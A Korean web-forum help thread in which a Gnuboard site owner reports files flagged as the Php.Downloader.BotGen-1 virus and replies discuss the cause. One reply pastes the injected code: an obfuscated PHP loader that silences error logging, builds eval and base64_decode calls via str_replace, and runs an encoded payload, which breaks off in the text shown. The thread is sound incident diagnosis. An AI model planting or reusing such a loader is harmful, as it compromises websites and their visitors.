파일 바이러스 감염

파일 바이러스 감염

QA

파일 바이러스 감염

본문

그누보드 5.3.3 버전을 해외 호스팅 업체의 서버에서 사용하고 있습니다.

실제 사용하려고 테스트 중이었는데 파일에 바이스러스(Php.Downloader.BotGen-1)가 감염되었다고 메일이 와서 확인해보니 정말 이상한 코드가 포함되어 있더군요. 해당 업체에 따르면 제사 사용하는 CMS가 보안이 취약하다고 하는데 어최신 버전은 이런 문제가 없는지요?

 

 

\adm\index.php: Php.Downloader.BotGen-1 FOUND
\adm\sms_admin\config.php: Php.Downloader.BotGen-1 FOUND
\config.php: Php.Downloader.BotGen-1 FOUND
\index.php: Php.Downloader.BotGen-1 FOUND
\install\index.php: Php.Downloader.BotGen-1 FOUND
\mobile\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\cheditor5\imageUpload\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\smarteditor2\photo_uploader\popup\php\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sms5\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\facebook\tests\bootstrap.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\twitter\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\includes\functions.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\mobile\index.php: Php.Downloader.BotGen-1 FOUND

이 질문에 댓글 쓰기 :

답변 3

오진 같은데요?

어떤 코드가 보안에 취약한지 메일을 보내보세요.

그리고 해외 호스팅 사용시 언어셋 차이에 따른 바이러스 오진결과가 나오기도 합니다.

그누보드5.4 사용하시면 문제가 없을 겁니다.

 

해당 서버에 PHP Malware Scanner 를 이용해 점검을 한번 해 보세요.

 

https://www.phpclasses.org/package/11074-PHP-Scan-PHP-files-to-find-malicious-code.html

실제로 파일을 열어 봤는데 아래와 같은 코드가 추가되어 있는 것을 볼수 있었습니다.

 

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     _reporting(0); @ini_set('display_errors', 0);  @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('error_reporting', 0); @ini_set('display_startup_errors', 0);function  ToSJa1QEZFVIthfxHCBC6($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} function  sdzwe5DAUwgcX6O3($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} function  s2QrBZMfzhvwXWigD8YqSY($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} $O9KBEcpT1Z4ll8O5EGqJ0Faj = 'bN2fAkLxkmYOoexg3ssfq6aaN2fAkLxkmYOoexg3ssfq6asN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6a6N2fAkLxkmYOoexg3ssfq6a4N2fAkLxkmYOoexg3ssfq6a_N2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6acN2fAkLxkmYOoexg3ssfq6aoN2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6ae'; $O9KBEcpT1Z4ll8O5EGqJ0Faj = s2QrBZMfzhvwXWigD8YqSY('N2fAkLxkmYOoexg3ssfq6a','',$O9KBEcpT1Z4ll8O5EGqJ0Faj); $hVGidB9zilH = 'cXrutWuCIjuNKFprXrutWuCIjuNKFpeXrutWuCIjuNKFpaXrutWuCIjuNKFptXrutWuCIjuNKFpeXrutWuCIjuNKFp_XrutWuCIjuNKFpfXrutWuCIjuNKFpuXrutWuCIjuNKFpnXrutWuCIjuNKFpcXrutWuCIjuNKFptXrutWuCIjuNKFpiXrutWuCIjuNKFpoXrutWuCIjuNKFpn'; $hVGidB9zilH = s2QrBZMfzhvwXWigD8YqSY('XrutWuCIjuNKFp','',$hVGidB9zilH); $bkXytTxV7EX1jxCyKIC4u8 = 'rBVtQ0RXT9fYpcZaFgerBVtQ0RXT9fYpcZaFgvrBVtQ0RXT9fYpcZaFgarBVtQ0RXT9fYpcZaFgl'; $bkXytTxV7EX1jxCyKIC4u8 = s2QrBZMfzhvwXWigD8YqSY('rBVtQ0RXT9fYpcZaFg','',$bkXytTxV7EX1jxCyKIC4u8); $mAbXInuReFECY = '$dNOHi68Bnhc4OJKpng'; $BJltwdCTG1ufuoAsrYTsLs = $hVGidB9zilH($mAbXInuReFECY,$bkXytTxV7EX1jxCyKIC4u8.'('.$O9KBEcpT1Z4ll8O5EGqJ0Faj.'('.$mAbXInuReFECY.'));'); $BJltwdCTG1ufuoAsrYTsLs('ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBTVWpGYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVlZWa2MyUlhSbGRQV0hCaFYwWkdkbE5xU2xOalIwMTZVVzVPV2xkSGVHMVhiR2hMWlZkSmVsTnVjRXRsV0dSdVZGVk9jazR3VG5KUmJrSnBZbGQ0YlZsNlNsZE5SWFJFV2tkNGFtSnJjREpaTW5jMVl6SkplVmt5TlUxU1ZGWlhWa1ZXTTJORk9UTmpSVVpvVm5wV2QxZEVUazlpUjFKRVdqSTFhVko2YkhWWFJFcFhaVmRPZEU5WWJHcGxWMDU2VkZWT2NrNHdUbkpSYmtKcFlsZDRiVmw2U2xkTlJYUkVXa2Q0YW1KcmNESlpNbmMxWlZad1dWRnVXbXBpYkVwM1dXMHhhbUpyZUVSUldHUk1Wa2hPVEZWVlpITmtWMFpYVDFod1lWZEdSblpUYWtwVFkwZE5lbEZ1VGxwWFIzaHRXWHBPVTJGSFRuVlZha1pxVW1wc2Mxa3lOVXRrYlU1MVZGYzFUVkV3UmpOVE1WSjZVekpHV0ZkWE9VcFdNVzk0V1cweFQwMUhSbGhQV0ZaWlRXeFpNRmxXYUU5TlIwNDFXakkxWVdKWGVIcFhiRmsxWkRKU1dWVnRXbHBOYW13eFdrVmtWMlJYVWtsVVZ6Vk1WVEowYmxwWVpIWmFNR3hFVVZka1lXSnNXakZYVkU1VFkwZEplVTVIWkdGaVYzaDZWMnhaTldReVVsbFZiVnBhVFdwc01WcEZaRmRrVjFKSlZGYzVTMUl4Y0hkWmEyUlhXbTFLZEZKdVVtRlZNMlJ1VTJ0a1UyRkhVa2hTV0VKS1UwaE9URk5WVGtKYU1HeEVVVmRrU2xFd1JuSlhiV3hDVDFWc1NGZHVXbXBTTVZveFV6Qk9VMkpYUmxobFIzaFpUV3BXYjFsc1pGWmpNR3gxV1RKc1RGWklUa3hUVlU1Q1dqQnNSRkZYWkVwUk1FcDBXVEJvVjAxSFRqVmFNblJoWVZoa2NsZHJaRWROUm14VVlYcGtSR0ZWUm01VFZVNUNXakJzUkZGWFpHRmlWVFY2V1dwT1QySkZkRVJWYlRGTVZraE9URk5WVGtKYU1HeEpUVVYwYlZVd1JreFpWbVJhV2pCMFJGSnRNV3RXZWxaeFdrVmtjMlJ0U25OUFYzaHNVako0TmxwRmFFNWlNR3h5Vld4U1VsWlhVbkpYYlRGcldtdHNjR0V6UW14a00wSjBXa1pqTVdGdFVraGlTRnBwWVZWS1JsWlVRa2RUUm5CSVYyMDFXV1ZYWkhkYVdHUjJVMjFPZEZacVFtdFhSWEF4VTFWT1EwMUhUblZXYlhoUVpETkJOVkV5TVhOaVZXeEVXakpvWVdKc1dqRlhWRTVUWTBkSmVVNVhXbUZYUjJoM1dYcE9VMlZyZEVSVGExWldUVVZhU1ZkclpHRmliR2Q1VkcwNVlWWXdOWGxYUkU1UFkwWnZlVTVIYkV4Vk1uY3pVVEprYzJKWFVsaE9WM0JyVWpKNE1sbHRiRU5TVmxWM1VtdG9ZVkl4Y0hWWFJFcFBZakZ3V0ZSdVNsbE5NRFYzVjJwSk1HSXdjRWhWYldoclVqQldlbE5yYUU5alJtOTVUa2hDYkdReU9VdFJNVTVUWkRKU1dGTnVTbUZYUjNSdVZVWk9RbUpyZUZSTlNGSk5WWHBHUkZWc1ZtdFRiRkp3VVd4R1YxWlZjRTVWTVZaT1dqRk5kMVpzY0UxVmVrSXdWRVpOZDJKcmVIQlRiVTVwWVZWc01WTnFRWGhTTWxGNldrVldWbFp0ZUV4VmVrazFXVlpPV0dGRVNscE5SRlpEVmxaV1YxRXhSbk5TYTBwVFVtczBlbFZXYUd0V1JrWldZMFZPVWxaWVVrNVdSM0J6WVVkV2RXTkVSazFOYlhReVZUQmFjMDFzWkZoVVdFcE9VbFUxV1ZSc1ZsTldNa1pXV2tWd2ExWlZOVXhYVnpWMlltdDRjRk50VG1saFZXd3hVMjV3U21WdFRYbGtSbWhxVFZVMVZscEVTakJWUlRWMVdrWlNZVTFyVlhwV1ZsWjNWbXR6ZVUxSVpHRldNMmhEV1d0a00yVnRSbFphUmxaVFlYcHNWVlZ0TlhkWFZrVjVZVWM1YVZJelozaFdSRTVMVjBVMWNHUkdaRmRoTTJoYVYxZHdiMUpHUmxsYVJWcFNWbFZhVTFWR1VYZGlhM2h3VTIxT2FXRlZiREZUYm10M1pFVjRWRTFJVWxOV1ZGWkdVMVZhUTFac1JuSmxSWEJTWlZWS1RWVnNXbkprUlhoVVRVaFNUVlV5VFROUk1tUnlVMnR3U1ZGcVJscGlXR2gzVjFSRk5XTnNjRmxpUjFwcVlsWmFObE5WVVhkYU1rbDZVVzE0YVdKck5UWlphMWsxWW14d1dWVnRXbXBUUmxwd1dXdGtjMkZ0UlhsV2FsWk1VVEZLTTFwR1pFdGpiSEJaWVROQ1VHUXlPVXRSTVU1VFpXMUdXRnBJVmtwU1JFSnVWMWN4UjJWc2NGVlhWRUpaVFd4S2MxZFVTVFZoTVhCVVdqSjBhazF0ZUhWWmJXeHlUakJPYm1Fd2NFdFNlbXg1VTFWUmQxb3lTWHBSYlhocFltczFObGxyV1RWTmJIQlpVMjVDWVdKdGRIWlRhMlJUWVVkU1NGSllUa3BSTVVvMldWWmthMlJWZUVSUlYzUnFVMFphY0ZsclpITmhiR2Q1WkVkNGJGWnFiRFZYYkdoT1l6QnNSazlXUmxOV1ZGWlZWbFJDTkZwc1JsWmxSV2hWVFZSc1ZWVXdWa1psUlhSVll6QjBSRlZYZUhkWGJXeHVZVEpKZVdNeVpGRldSRUp1VkZaT2MwNHdUbTVoTUhCRVYwVndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVNMlIyVTJ0T1dVMUhaR0ZXTTJnMlYyeE9RMDR3VG01aE1IQkVWMFZ3YzFwRmFGZGxWMHB3VVcweFdsWXphRFpYYkZKNlV6Qk9VbUpFYkVSYU1uYzFVVEkwZDFNeVJsaFhWMlJNVVRCYWRGcEdZekZoYlZKSVlraGFhV0pFYkhOYVZXUnpaVzFTU1ZSWE9VcGhNVXBWVlZaV2EyRXhjSFJhUjFwWFRXcHNOVmxVUlRWaE1YQllWRzVhWVZJeFZuQlRNVTV6VGpCT2JtSkhNV3RXZWxaeFdrVmtjMlJ0U25CUmExWldUVVZhU1ZkclpHRmliR2Q0V2toYWFtSllVbTFYYTJSWFlXMUplVlZ0ZUV4Uk1VcFZXa1ZvUzJOSFNuUlpNMEpzWkRJNWJsTlZUa0phTUU1VVZXeFNhMU5GY0hkWmJURnFXakZDVkZGdGJGcFhSVFZ6Vkcxd1UxcHNjRWhXYlhCcFRXeEtjMU13VGxOV1IxSkpVMjVDYVd

답변을 작성하시기 전에 로그인 해주세요.
전체 123,128 | RSS
QA 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT